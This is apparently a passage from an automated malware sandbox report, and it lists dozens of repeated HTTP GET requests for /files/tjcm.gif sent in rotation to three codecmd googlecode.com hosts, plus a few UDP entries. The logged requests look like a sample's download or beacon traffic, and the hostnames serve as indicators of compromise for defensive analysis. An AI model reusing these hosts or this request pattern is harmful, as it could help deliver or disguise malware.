                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
